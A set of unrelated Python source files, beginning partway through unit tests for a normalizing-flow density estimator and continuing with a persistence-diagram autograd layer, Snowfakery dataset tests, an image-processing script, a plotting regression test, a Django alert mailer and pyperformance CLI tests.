            p_true = sess.run(bimix_gauss.prob(y))
            self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.01)
    def test_dropout(self):
        """Moderate dropout should fit well; extreme dropout should degrade the fit."""
        with tf.Session() as sess:
            bimix_gauss = tf.contrib.distributions.Mixture(
                cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
                components=[
                    tf.distributions.Normal(loc=-1., scale=0.5),
                    tf.distributions.Normal(loc=+1., scale=0.5),
                ])
            x = np.ones(5000)
            y = sess.run(bimix_gauss.sample([5000]))
            dropout_model = NormalizingFlowEstimator("nf_dropout_reasonable", 1, 1,
                                                     flows_type=('affine', 'radial', 'radial'),
                                                     data_normalization=True, dropout=0.5, random_seed=22)
            full_dropout = NormalizingFlowEstimator("nf_dropout_full", 1, 1,
                                                    flows_type=('affine', 'radial', 'radial'),
                                                    data_normalization=True, dropout=0.85, random_seed=22)
            dropout_model.fit(x, y)
            full_dropout.fit(x, y)
            p_est = dropout_model.pdf(x, y)
            p_est_trash = full_dropout.pdf(x, y)
            p_true = sess.run(bimix_gauss.prob(y))
            self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.02)
            self.assertGreater(np.mean(np.abs(p_true - p_est_trash)), 0.02)
class TestSerialization(unittest.TestCase):
    """Round-trips a fitted estimator through pickle and checks the pdf
    is preserved across a fresh TF graph/session."""
    def get_samples(self, std=1.0):
        """Return 2000 samples with 2-D X and 2-D Y, fixed seed."""
        np.random.seed(22)
        data = np.random.normal([2, 2, 2, 2], std, size=(2000, 4))
        X = data[:, 0:2]
        Y = data[:, 2:4]
        return X, Y
    def test_pickle_unpickle_NF_estimator(self):
        X, Y = self.get_samples()
        with tf.Session() as sess:
            model = NormalizingFlowEstimator('nf_pickle', 2, 2, ('affine', 'radial', 'radial'),
                                             data_normalization=True, random_seed=22, n_training_epochs=10)
            model.fit(X, Y)
            pdf_before = model.pdf(X, Y)
            dump_string = pickle.dumps(model)
        # unpickle into a brand-new graph to prove the dump is self-contained
        tf.reset_default_graph()
        with tf.Session() as sess:
            model_loaded = pickle.loads(dump_string)
            pdf_after = model_loaded.pdf(X, Y)
        diff = np.sum(np.abs(pdf_after - pdf_before))
        self.assertAlmostEqual(diff, 0, places=2)
class TestFitByCrossval(unittest.TestCase):
    """Checks that fit_by_cv picks the better hyper-parameter setting."""
    def get_samples(self, std=1.0, mean=2):
        """Return 2000 paired Gaussian samples (X, Y) with a fixed seed."""
        np.random.seed(22)
        data = np.random.normal([mean, mean], std, size=(2000, 2))
        X = data[:, 0]
        Y = data[:, 1]
        return X, Y
    def test_NF_fit_by_crossval(self):
        X, Y = self.get_samples(std=1., mean=-4)
        # 0 vs. 500 epochs: cross-validation must select the trained model
        param_grid = {
            'n_training_epochs': [0, 500],
            'data_normalization': [False]
        }
        model = NormalizingFlowEstimator('nf_crossval', 1, 1)
        model.fit_by_cv(X, Y, param_grid=param_grid)
        y = np.arange(-1, 5, 0.5)
        x = np.asarray([2 for _ in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=2, scale=1)
        self.assertEqual(model.get_params()["n_training_epochs"], 500)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.2)
if __name__ == '__main__':
    warnings.filterwarnings("ignore")
    # Test classes to run; commented entries are intentionally disabled.
    testmodules = [
        'unittests_normalizing_flows.Test_NF_2d_gaussian',
        'unittests_normalizing_flows.TestLogProbability',
        'unittests_normalizing_flows.TestFlows',
        # 'unittests_normalizing_flows.TestMultiModal',
        'unittests_normalizing_flows.TestRegularization',
        'unittests_normalizing_flows.TestSerialization',
        # 'unittests_normalizing_flows.TestFitByCrossval',
    ]
    suite = unittest.TestSuite()
    for dotted_name in testmodules:
        try:
            # Prefer an explicit suite() factory when the module provides one.
            module = __import__(dotted_name, globals(), locals(), ['suite'])
            suite.addTest(getattr(module, 'suite')())
        except (ImportError, AttributeError):
            # Otherwise load every test case reachable under the dotted name.
            suite.addTest(unittest.defaultTestLoader.loadTestsFromName(dotted_name))
    unittest.TextTestRunner().run(suite)
|
11520197
|
from __future__ import print_function
import numpy as np
# import sys
# sys.path.append('../Python')
from ..util.flag_dionysus import computePersistence
import dionysus as d
import time
import torch
from torch.autograd import Variable, Function
# Global tensor dtype for the Diagramlayer below.
dtype=torch.float32 # torch.double #torch.float32
# Toggle for the plotting code in the __main__ section.
PLOT = True
''' OBS: -1.0 are used as a token value for dgm values and indicies!!!!!! '''
class Diagramlayer(Function):
    """Autograd function computing persistence diagrams of a point cloud.

    forward() builds a Rips filtration with dionysus and returns the
    (birth, death) pairs per homology dimension; backward() routes the
    diagram gradients back to the generating points.
    Token values: -1 for missing indices, -inf for missing diagram entries.
    """
    # Note that both forward and backward are @staticmethods
    @staticmethod
    def forward(ctx, x, saturation=None, maxdim=1, verbose=False):
        """Compute persistence diagrams for the point cloud `x`.

        Args:
            ctx: autograd context used to stash tensors for backward().
            x: (num_points, dim) tensor of point coordinates.
            saturation: maximal Rips radius; also substituted for infinite
                death values. Falls back to 3.1 with a warning when omitted.
            maxdim: maximal homology dimension to return.
            verbose: print timing information.

        Returns:
            (maxdim+1, num_dgm_pts, 2) tensor of (birth, death) pairs,
            padded with -inf where a dimension has fewer points.
        """
        MAX_DIMENSION = maxdim + 1  # maximal simplex dimension
        if verbose: print("*** dgm start")
        # Fixed '== None' -> 'is None': identity test is the correct way to
        # detect an omitted argument (equality may broadcast for tensors).
        if saturation is None:
            SATURATION_VALUE = 3.1
            print("==== WARNING: NO SATURATION VALUE GIVEN, {}".format(SATURATION_VALUE))
        else:
            SATURATION_VALUE = saturation
        start_time = time.time()
        function_values = x
        # list of function values on vertices, and maximal dimension it will return 0,1,2,3
        function_useable = function_values.data.numpy()
        ''' returns (sorted) filtration filled with the k-skeleton of the clique complex built on the points at distance at most r from each other '''
        F = d.fill_rips(function_useable, MAX_DIMENSION, SATURATION_VALUE)
        # F.sort() # this is done in computePersistence
        dgms, Tbl = computePersistence(F)
        # pad every dimension to the size of the largest diagram
        max_pts = np.max([len(dgms[i]) for i in range(maxdim+1)])
        num_dgm_pts = max_pts
        ''' -1 is used later as the "no simplex" token '''
        dgms_inds = -1 * np.ones([maxdim+1, num_dgm_pts, 4])
        dgms_values = -np.inf * np.ones([maxdim+1, num_dgm_pts, 2]) # -1.0 * np.ones([3, num_dgm_pts, 2])
        for dim in range(maxdim+1):
            if len(dgms[dim]) > 0:
                dgm = np.array(dgms[dim])
                dgm[dgm == np.inf] = SATURATION_VALUE
                l = np.min([num_dgm_pts, len(dgm)])
                # keep the most persistent points first
                arg_sort = np.argsort(np.abs(dgm[:,1] - dgm[:,0]))[::-1]
                dgms_inds[dim][:l] = dgm[arg_sort[:l], 2:6]
                dgms_values[dim][:l] = dgm[arg_sort[:l], 0:2]
        dgms_inds = dgms_inds.reshape([maxdim+1, num_dgm_pts, 2, 2])
        output = torch.tensor(dgms_values).type(dtype)
        ctx.save_for_backward(x, torch.tensor(dgms_inds).type(dtype), output, torch.tensor(verbose))
        if verbose: print("*** dgm done", time.time() - start_time)
        return output
    # This function has only a single output, so it gets only one gradient
    @staticmethod
    def backward(ctx, grad_output):
        """Backpropagate diagram gradients onto the input points.

        Returns (grad_input, None, None, None) — trailing Nones match the
        non-differentiable saturation/maxdim/verbose arguments of forward().
        """
        # Fixed: ctx.saved_variables was removed from PyTorch; saved_tensors
        # is the supported accessor.
        input, dgms_inds, dgms_values, verbose = ctx.saved_tensors
        if verbose: print("*** dgm back")
        start_time = time.time()
        points = input.data.numpy()
        output = dgms_values.detach().numpy()
        grad_input = torch.zeros(input.shape).type(dtype)
        # MASK so only diagram entries that map to real simplices contribute
        output[output == np.inf] = -np.inf # death_value infinite doesn't correspond to a simplex
        output[output > -np.inf] = 1 # actual values that map to simplices
        output[output == -np.inf] = 0 # padding entries must not affect the gradient
        # Fixed: np.int was removed in NumPy 1.24; the builtin int is equivalent.
        np_dgms_inds = dgms_inds.data.numpy().astype(int) # (3, 18424, 2, 2)
        list_of_unique_indices = np.unique(np_dgms_inds.flatten())
        grad_intermediate = output * grad_output.detach().numpy() # Not necessary? (dgms, dgm_pts, 2)
        ''' will have incorrect mappings for token -1 entries, but these are skipped below '''
        pts_of_inds = points[np_dgms_inds]
        for i in range(len(list_of_unique_indices)):
            index = int(list_of_unique_indices[i]) # index into input; gather everything that maps to this point
            ''' -1 is the "not mapped anywhere" token set above '''
            if index > -1:
                index_into_dgms_inds = np.argwhere(np_dgms_inds == index)
                index_into_dgms_inds = index_into_dgms_inds.transpose()
                # the partner vertex of each edge: flip the last axis 0<->1
                index_into_dgms_inds_partners = np.copy(index_into_dgms_inds)
                index_into_dgms_inds_partners[-1, :] = np.remainder(index_into_dgms_inds[-1, :] + 1, 2)
                # Fixed: index with a tuple — indexing with a list of arrays
                # (legacy tuple interpretation) is removed in modern NumPy.
                intermediate = pts_of_inds[tuple(index_into_dgms_inds)] - pts_of_inds[tuple(index_into_dgms_inds_partners)]
                ''' No 1.0/2 factor for dionysus '''
                ''' Dividing by np.linalg.norm for zero norm has unintended consequences '''
                norms = np.linalg.norm(intermediate, axis=1)
                norms[norms == 0] = 1.0
                intermediate = ( intermediate.transpose() / norms).transpose()
                inds_into_grad_output = index_into_dgms_inds[:-1, :]
                grad_output_and_intermediate = (intermediate.transpose() * grad_intermediate[ tuple(inds_into_grad_output) ]).transpose()
                update = np.sum( grad_output_and_intermediate.reshape([-1, input.shape[1]]), axis=0 )
                grad_input[int(index)] = torch.tensor(update).type(dtype)
        if verbose: print("*** dgm back done", time.time() - start_time)
        return grad_input, None, None, None
# Gradient check of the Diagramlayer on points sampled from the unit circle.
if __name__ == "__main__":
    diagramlayer = Diagramlayer.apply
    from torch.autograd import gradcheck
    from utils_plot import plot_diagram2
    from scipy.spatial import Delaunay
    ''' #### Generate initial points #### '''
    import matplotlib.pyplot as plt
    np.random.seed(0)
    num_samples = 30 # 2048
    # make a simple unit circle
    theta = np.linspace(0, 2*np.pi, num_samples)
    a, b = 1 * np.cos(theta), 1 * np.sin(theta)
    # generate the points
    theta = np.random.rand((num_samples)) * (2 * np.pi)
    r = 1.0 # np.random.rand((num_samples))
    x, y = r * np.cos(theta), r * np.sin(theta)
    circle = np.array([x,y]).reshape([len(x), 2])
    # project every point exactly onto the unit circle
    circle = (circle.T * (1.0 / np.linalg.norm(circle, axis=1))).T
    #print circle
    plt.figure()
    plt.scatter(circle[:,0], circle[:,1])
    plt.savefig('CIRCLE.png')
    ''' #### END #### '''
    ''' #### Rips #### '''
    # f = d.fill_rips(circle, 2, 2.1)
    # f.sort()
    # gradchek takes a tuple of tensor as input, check if your gradient
    # evaluated with these tensors are close enough to numerical
    # approximations and returns True if they all verify this condition.
    layer = Diagramlayer.apply
    ''' #### Test #### '''
    weights = Variable(torch.tensor(circle).type(dtype), requires_grad=True)
    # diagramlayer = Diagramlayer.apply
    # dgms = diagramlayer(weights)
    # dgms = dgms.detach().numpy()
    # print dgms
    # for d_i in range(dgms.shape[0]):
    #
    #     dgmpts = dgms[d_i]
    #     print dgmpts.shape
    #     dgmpts = np.delete(dgmpts, np.where((dgmpts == (-np.inf, -np.inf)).all(axis=1)), axis=0)
    #     dgmpts0 = dgmpts
    #     if len(dgmpts) > 0:
    #         fig = plot_diagram2(dgmpts, 'Dimension {}'.format(0))
    #     else:
    #         fig = plt.figure()
    #     fig.savefig('dgm{}_{}.png'.format(d_i, "test"))
    saturation = 1.1
    input = (weights, saturation)
    test = gradcheck(layer, input, eps=1e-4, atol=1e-3)
    print(test)
|
11520260
|
import inflection
class NamedElement(object):
    """Base class for model elements carrying a name and a description.

    Accessing the virtual attributes ``CamelCase``, ``camelCase`` or
    ``snake_case`` returns ``self.name`` re-cased via :mod:`inflection`,
    with reserved-word fixup applied.
    """

    def __init__(self, **kwargs):
        super(NamedElement, self).__init__()
        self.name = kwargs.pop('name', "unnamed")
        self.description = kwargs.pop('description', "")

    def __getattribute__(self, name):
        # Computed, virtual attributes; any other name falls through to the
        # normal attribute lookup below.
        lam = {'CamelCase': lambda: inflection.camelize(self.name),
               'camelCase': lambda: inflection.camelize(self.name, False),
               'snake_case': lambda: inflection.underscore(self.name)}\
            .get(name)
        if lam:
            return NamedElement.__fixup_name(lam())
        try:
            return super(NamedElement, self).__getattribute__(name)
        except AttributeError:
            # BUG FIX: was 'except e:', which raised NameError at exception
            # time instead of reporting the missing attribute.
            raise AttributeError("Attribute '%s' not found in %s.NamedElement"
                                 % (name, self.__module__))

    @staticmethod
    def __fixup_name(name):
        """Append underscores until `name` is not a reserved word.

        Some names are reserved in some languages. Fixup names to avoid
        using reserved words.
        """
        # List of reserved words from http://en.cppreference.com/w/cpp/keyword
        cppReserved = frozenset({
            "alignas", "alignof", "and", "and_eq", "asm", "auto",
            "bitand", "bitor", "bool", "break", "case", "catch", "char",
            "char16_t", "char32_t", "class", "compl", "const",
            "constexpr", "const_cast", "continue", "decltype", "default",
            "delete", "do", "double", "dynamic_cast", "else", "enum",
            "explicit", "export", "extern", "false", "float", "for",
            "friend", "goto", "if", "inline", "int", "long", "mutable",
            "namespace", "new", "noexcept", "not", "not_eq", "nullptr",
            "operator", "or", "or_eq", "private", "protected", "public",
            "register", "reinterpret_cast", "return", "short", "signed",
            "sizeof", "static", "static_assert", "static_cast", "struct",
            "switch", "template", "this", "thread_local", "throw", "true",
            "try", "typedef", "typeid", "typename", "union", "unsigned",
            "using", "virtual", "void", "volatile", "wchar_t", "while",
            "xor", "xor_eq"})
        while name in cppReserved:
            name = name + "_"
        return name
|
11520277
|
from pathlib import Path
from io import StringIO
from unittest import mock
import pytest
from snowfakery.data_generator import generate
from snowfakery import data_gen_exceptions as exc
from snowfakery.standard_plugins.datasets import SQLDatasetRandomPermutationIterator
class TestExternalDatasets:
    """Tests for the ``Dataset`` standard plugin.

    Covers linear iteration and shuffled permutation over CSV and SQL
    datasets, plus error reporting for missing/invalid inputs.
    ``generated_rows`` is a pytest fixture (defined elsewhere) that records
    the rows emitted by ``generate``.
    """
    def test_csv_dataset_linear(self, generated_rows):
        # Rows come from the CSV in file order and wrap around at the end.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 10
              fields:
                __address_from_csv:
                    Dataset.iterate:
                        dataset: %s/../examples/datasets/addresses.csv
                City: ${{__address_from_csv.City}}
            """
            % abs_path
        )
        generate(StringIO(yaml), {})
        assert generated_rows.row_values(0, "City") == "Burnaby"
        assert generated_rows.row_values(1, "City") == "White Rock"
        # wraps around:
        assert generated_rows.row_values(7, "City") == "White Rock"
        assert generated_rows.row_values(8, "City") == "Richmond"
    def test_SQL_dataset_linear(self, generated_rows):
        # Same wrap-around behavior against a SQLite-backed dataset.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 10
              fields:
                __name_from_db:
                    Dataset.iterate:
                        dataset: sqlite:///%s/databases/test_db.db
                FirstName: ${{__name_from_db.first_name}}
                LastName: ${{__name_from_db.last_name}}
            """
            % abs_path
        )
        generate(StringIO(yaml), {})
        assert generated_rows.row_values(0, "FirstName") == "Test"
        assert generated_rows.row_values(0, "LastName") == "User"
        assert generated_rows.row_values(1, "FirstName") == "Zest"
        # wraps around:
        assert generated_rows.row_values(7, "FirstName") == "Test"
        assert generated_rows.row_values(7, "LastName") == "User"
        assert generated_rows.row_values(8, "FirstName") == "Zest"
    def test_csv_dataset_permutation(self, generated_rows):
        # Shuffle yields each row once per pass, in some random order.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 14
              fields:
                __address_from_csv:
                    Dataset.shuffle:
                        dataset: %s/../examples/datasets/addresses.csv
                City: ${{__address_from_csv.City}}
            """
            % abs_path
        )
        generate(StringIO(yaml), {})
        first_3 = [generated_rows.row_values(i, "City") for i in range(0, 3)]
        assert len(first_3) == len(set(first_3))  # 3 unique items, in some order
        # NOTE(review): despite the name, this collects rows 3..13 (11 rows);
        # the set comparison still only checks the same cities re-appear.
        next_3 = [generated_rows.row_values(i, "City") for i in range(3, 14)]
        assert set(first_3) == set(next_3)
    def test_SQL_dataset_permutation(self, generated_rows):
        # Same uniqueness-per-pass property for a SQL-backed shuffle.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 14
              fields:
                __name_from_db:
                    Dataset.shuffle:
                        dataset: sqlite:///%s/databases/test_db.db
                        table: contacts
                FirstName: ${{__name_from_db.first_name}}
                LastName: ${{__name_from_db.last_name}}
            """
            % abs_path
        )
        generate(StringIO(yaml), {})
        first_7 = [generated_rows.row_values(i, "FirstName") for i in range(0, 7)]
        assert len(first_7) == len(set(first_7))  # 7 unique items, in some order
        next_7 = [generated_rows.row_values(i, "FirstName") for i in range(7, 14)]
        assert set(first_7) == set(next_7)
    def test_SQL_dataset_permutation_really_shuffles(self, generated_rows):
        """Verify the random-permutation iterator's query is actually used."""
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 14
              fields:
                __name_from_db:
                    Dataset.shuffle:
                        dataset: sqlite:///%s/databases/test_db.db
                        table: contacts
                FirstName: ${{__name_from_db.first_name}}
                LastName: ${{__name_from_db.last_name}}
            """
            % abs_path
        )
        orig_query = SQLDatasetRandomPermutationIterator.query
        called = None
        # Spy wrapper: records the call, then delegates to the real query.
        def new_query(self):
            nonlocal called
            called = True
            return orig_query(self)
        with mock.patch(
            "snowfakery.standard_plugins.datasets.SQLDatasetRandomPermutationIterator.query",
            new_query,
        ):
            generate(StringIO(yaml), {})
        assert called
    def test_csv_missing(self):
        # A nonexistent CSV path surfaces as a DataGenError.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              fields:
                __address_from_csv:
                    Dataset.iterate:
                        dataset: %s/test_csv_missing.csv
            """
            % abs_path
        )
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "File not found" in str(e.value)
    def test_csv_wrong_name(self):
        # A non-.csv file is rejected by extension.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              fields:
                __address_from_csv:
                    Dataset.iterate:
                        dataset: %s/test_external_datasets.py
            """
            % abs_path
        )
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "Filename extension must be .csv" in str(e.value)
    def test_csv_bad_column_name(self):
        # Referencing a column not in the CSV header reports the real columns.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              fields:
                __address_from_csv:
                    Dataset.iterate:
                        dataset: %s/badcsv.csv
                foo: ${{__address_from_csv.name}}
            """
            % abs_path
        )
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "'xname ', 'fake'" in str(e.value)
    def test_csv_utf_8_bom(self, generated_rows):
        """A UTF-8 BOM at the start of the CSV must not corrupt the header."""
        abs_path = Path(__file__).parent
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              fields:
                __address_from_csv:
                    Dataset.iterate:
                        dataset: %s/utf_8_bom_csv.csv
                foo: ${{__address_from_csv.name}}
            """
            % abs_path
        )
        # Precondition: the fixture file really starts with a BOM.
        with (abs_path / "utf_8_bom_csv.csv").open("rb") as f:
            assert f.read(10).startswith(b"\xef\xbb\xbf")
        generate(StringIO(yaml), {})
        assert generated_rows.table_values("XXX", 1, "foo") == "Afghanistan"
    def test_SQL_dataset_bad_tablename(self, generated_rows):
        # Naming a table that isn't in the database raises a clear error.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 14
              fields:
                __name_from_db:
                    Dataset.iterate:
                        dataset: sqlite:///%s/databases/test_db.db
                        table: xyzzy
                FirstName: ${{__name_from_db.first_name}}
                LastName: ${{__name_from_db.last_name}}
            """
            % abs_path
        )
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "Cannot find table: xyzzy" in str(e.value)
    def test_SQL_dataset_missing_table(self, generated_rows):
        # SQLite creates the file on open, so an empty DB means "no tables".
        yaml = """
        - plugin: snowfakery.standard_plugins.datasets.Dataset
        - object: XXX
          fields:
            __name_from_db:
                Dataset.iterate:
                    dataset: sqlite:///tests/databases/missing_db.db
        """
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "no tables" in str(e.value)
    def test_SQL_dataset_missing_file(self, generated_rows):
        # An unreachable path surfaces SQLite's own error message.
        yaml = """
        - plugin: snowfakery.standard_plugins.datasets.Dataset
        - object: XXX
          fields:
            __name_from_db:
                Dataset.iterate:
                    dataset: sqlite:////xxxxyzzz/missing_db.db
        """
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "unable to open database file" in str(e.value)
    def test_SQL_dataset_multitable_file(self, generated_rows):
        # Without an explicit `table:`, a multi-table DB is ambiguous.
        abs_path = str(Path(__file__).parent)
        yaml = (
            """
            - plugin: snowfakery.standard_plugins.datasets.Dataset
            - object: XXX
              count: 14
              fields:
                __name_from_db:
                    Dataset.iterate:
                        dataset: sqlite:///%s/databases/multitable.db
                FirstName: ${{__name_from_db.first_name}}
                LastName: ${{__name_from_db.last_name}}
            """
            % abs_path
        )
        with pytest.raises(exc.DataGenError) as e:
            generate(StringIO(yaml), {})
        assert "multiple tables in it" in str(e.value)
    def test_datasets_example(self, capsys, caplog):
        """Datasets can output warnings if they don't close properly.
        This test checks that they DO close properly and DO NOT output warnings."""
        with open(
            Path(__file__).parent.parent / "examples/datasets/datasets.recipe.yml"
        ) as f:
            generate(f, {})
        assert capsys.readouterr().err == ""
        assert caplog.text == ""
|
11520305
|
import infrastructure.intake as intake
import infrastructure.log as log
import core.vision as vision
import numpy as np
import cv2
def run(img, logOn=True):
    """White-balance *img*, locate the sheet of paper in it, and return
    the extracted paper region in HSV color space.

    Each intermediate stage is written to the log when *logOn* is true.
    """
    def maybe_log(stage, **extra):
        # Forward a stage image to the logger only when logging is enabled.
        if logOn:
            log.hsvOrGreyImage(stage, **extra)

    balanced = vision.white_balance(img)
    hsv = cv2.cvtColor(balanced, cv2.COLOR_BGR2HSV)
    maybe_log(hsv)
    edges = vision.find_edges(hsv)
    maybe_log(edges)
    paper_contour = vision.find_paper(edges)
    maybe_log(hsv, contours=[paper_contour])
    extracted = vision.extract_paper(hsv, paper_contour)
    maybe_log(extracted)
    return extracted
def sample():
    """Return the default sample input image for manual testing of run()."""
    return intake.image_file("input/grid_drawing.jpg")
|
11520320
|
# NOTE(review): Python 2-era script (uses raw_input); runs a VCS regression
# test comparing a rendered image against a baseline given on the CLI.
import os, sys, vcs.testing.regression as regression
import vcs
from vcsaddons import EzTemplate
import cdms2,vcs,sys
## 12 plots 1 legend per row on the right
## Initialize VCS
x = vcs.init()
x.drawlogooff()
# Render in background (headless) mode.
bg = True
# 4x3 grid of templates; legends drawn vertically.
M = EzTemplate.Multi(rows=4,columns=3)
M.legend.direction='vertical'
for i in range(12):
  t=M.get(legend='local')
  # Keep a legend only on the last column of each row.
  if i%3 !=2:
    t.legend.priority=0 # Turn off legend
# Render the layout and compare against the baseline image in sys.argv[1].
fnm = "test_12_plot_one_leg_per_row_right.png"
M.preview(fnm,bg=bg)
ret = regression.check_result_image(fnm, sys.argv[1])
if not bg:
    raw_input("Press Enter")
sys.exit(ret)
|
11520358
|
import logging
from datetime import timedelta, datetime
from typing import Optional, List
from django.conf import settings
from django.contrib.auth.models import User
from django.template.loader import get_template
from django.utils import timezone
from django.utils.translation import gettext as _
from elasticsearch_dsl import Q
from html2text import html2text
from mainapp.functions.mail import send_mail
from mainapp.functions.search import MainappSearch, parse_hit
from mainapp.functions.search_notification_tools import search_result_for_notification
from mainapp.models import UserAlert
logger = logging.getLogger(__name__)
class NotifyUsers:
    """Sends e-mail notifications to users whose saved search alerts
    (``UserAlert``) have new matches since the last run."""

    # Window used when an alert has never matched and no override is given.
    fallback_timeframe = timedelta(days=14)

    def __init__(
        self, override_since: Optional[datetime] = None, simulate: bool = False
    ):
        # override_since: search from this fixed time instead of each
        #   alert's last_match; also suppresses updating last_match.
        # simulate: log the rendered mail instead of sending it.
        self.override_since = override_since
        self.simulate = simulate

    def perform_search(self, alert: UserAlert) -> List[dict]:
        """Run the alert's saved search restricted to documents modified
        since the relevant cutoff and return the parsed hits."""
        if self.override_since is not None:
            since = self.override_since
        elif alert.last_match is not None:
            since = alert.last_match
        else:
            since = timezone.now() - self.fallback_timeframe
        search = MainappSearch(
            alert.get_search_params(),
            extra_filter=[Q("range", modified={"gte": since.isoformat()})],
        )
        executed = search.execute()
        return [parse_hit(hit) for hit in executed.hits]

    def notify_user(self, user: User) -> bool:
        """Render and send the notification mail for one user.

        Returns True iff the user had at least one alert with new results.
        """
        context = {
            "base_url": settings.ABSOLUTE_URI_BASE,
            "site_name": settings.TEMPLATE_META["logo_name"],
            "alerts": [],
            "email": user.email,
        }
        for alert in user.useralert_set.all():
            notify_objects = self.perform_search(alert)
            # BUG FIX: the original first looped over notify_objects calling
            # search_result_for_notification and discarding every result,
            # then repeated the same calls below - dead duplicate work.
            if notify_objects:
                results = [
                    search_result_for_notification(obj) for obj in notify_objects
                ]
                context["alerts"].append({"title": str(alert), "results": results})
        logger.debug("User %s: %i results\n", user.email, len(context["alerts"]))
        if not context["alerts"]:
            return False
        message_html = get_template("email/user-alert.html").render(context)
        # NOTE(review): this replace is a no-op ("<mark>" -> "<mark>");
        # presumably it was meant to unescape highlight markers - confirm.
        message_html = message_html.replace("<mark>", "<mark>").replace(
            "</mark>", "</mark>"
        )
        message_text = html2text(message_html)
        if self.simulate:
            # Was logging.info: use the module-level logger consistently.
            logger.info(message_text)
        else:
            # TODO: When this is called by cron it shouldn't write to stdout
            logger.info("Sending notification to: %s", user.email)
            send_mail(
                user.email,
                settings.PRODUCT_NAME + ": " + _("New search results"),
                message_text,
                message_html,
                user.profile,
            )
        # Only advance last_match in a real (non-overridden) run.
        if not self.override_since:
            for alert in user.useralert_set.all():
                alert.last_match = timezone.now()
                alert.save()
        return True

    def notify_all(self):
        """Notify every active user and log how many were actually mailed."""
        alerts_sent = 0
        for user in User.objects.filter(is_active=True).all():
            if self.notify_user(user):
                alerts_sent += 1
        logger.info(f"Sent notifications to {alerts_sent} users")
|
11520362
|
import os
import os.path
import shutil
import sys
import textwrap
import unittest
import pyperformance
from pyperformance import tests
class FullStackTests(tests.Functional, unittest.TestCase):
    """End-to-end tests that drive the ``pyperformance`` CLI inside a venv."""
    maxDiff = 80 * 100
    @classmethod
    def setUpClass(cls):
        # pyperformance must be installed in order to run,
        # so we make sure it is.
        cls.ensure_venv()
        cls.ensure_pyperformance()
        super().setUpClass()
    @classmethod
    def ensure_pyperformance(cls):
        """Install pyperformance (editable) into the test venv if missing."""
        ec, stdout, _ = cls.run_python(
            os.path.join(tests.DATA_DIR, 'find-pyperformance.py'),
            capture='stdout',
            onfail='raise',
            verbose=False,
        )
        assert ec == 0, ec
        stdout = stdout.strip()
        if stdout.strip():
            # It is already installed.
            return
        print('#'*40)
        print('# installing pyperformance into the venv')
        print('#'*40)
        print()
        # Install it.
        reporoot = os.path.dirname(pyperformance.PKG_ROOT)
        # XXX Ignore the output (and optionally log it).
        ec, _, _ = cls.run_pip('install', '--editable', reporoot)
        assert ec == 0, ec
        # Clean up extraneous files.
        egg_info = "pyperformance.egg-info"
        print(f"(tests) Remove directory {egg_info}", flush=True)
        try:
            shutil.rmtree(egg_info)
        except FileNotFoundError:
            pass
        print()
        print('#'*40)
        print('# DONE: installing pyperformance into the venv')
        print('#'*40)
        print()
    def run_pyperformance(self, cmd, *args,
                          exitcode=0,
                          capture='both',
                          verbose=True,
                          ):
        """Run a pyperformance subcommand, assert on its exit code, and
        return its (rstripped) stdout.  exitcode=True means "expect any
        nonzero exit code"."""
        ec, stdout, stderr = self.run_module(
            'pyperformance', cmd, *args,
            capture=capture,
            onfail=None,
            verbose=verbose,
        )
        if exitcode is True:
            self.assertGreater(ec, 0, repr(stdout))
        else:
            self.assertEqual(ec, exitcode, repr(stdout))
        if stdout:
            stdout = stdout.rstrip()
        return stdout
    ###################################
    # info
    def test_list(self):
        # XXX Capture and check the output.
        self.run_pyperformance('list', capture=None)
    def test_list_groups(self):
        # XXX Capture and check the output.
        self.run_pyperformance('list_groups', capture=None)
    ###################################
    # venv
    def test_venv(self):
        """Exercise the full venv lifecycle: show/create/recreate/remove."""
        # XXX Capture and check the output.
        root = self.resolve_tmp('venv', unique=True)
        def div():
            # Visual separator between CLI invocations in the test output.
            print()
            print('---')
            print()
        def expect_success(*args):
            text = self.run_pyperformance(
                *args,
                capture=None,
            )
        def expect_failure(*args):
            text = self.run_pyperformance(
                *args,
                capture=None,
                exitcode=1,
            )
        # It doesn't exist yet.
        expect_success('venv', 'show', '--venv', root)
        div()
        # It gets created.
        expect_success('venv', 'create', '--venv', root)
        div()
        expect_success('venv', 'show', '--venv', root)
        div()
        # It alraedy exists.
        expect_failure('venv', 'create', '--venv', root)
        div()
        expect_success('venv', 'show', '--venv', root)
        div()
        # It gets re-created.
        expect_success('venv', 'recreate', '--venv', root)
        div()
        expect_success('venv', 'show', '--venv', root)
        div()
        # It get deleted.
        expect_success('venv', 'remove', '--venv', root)
        div()
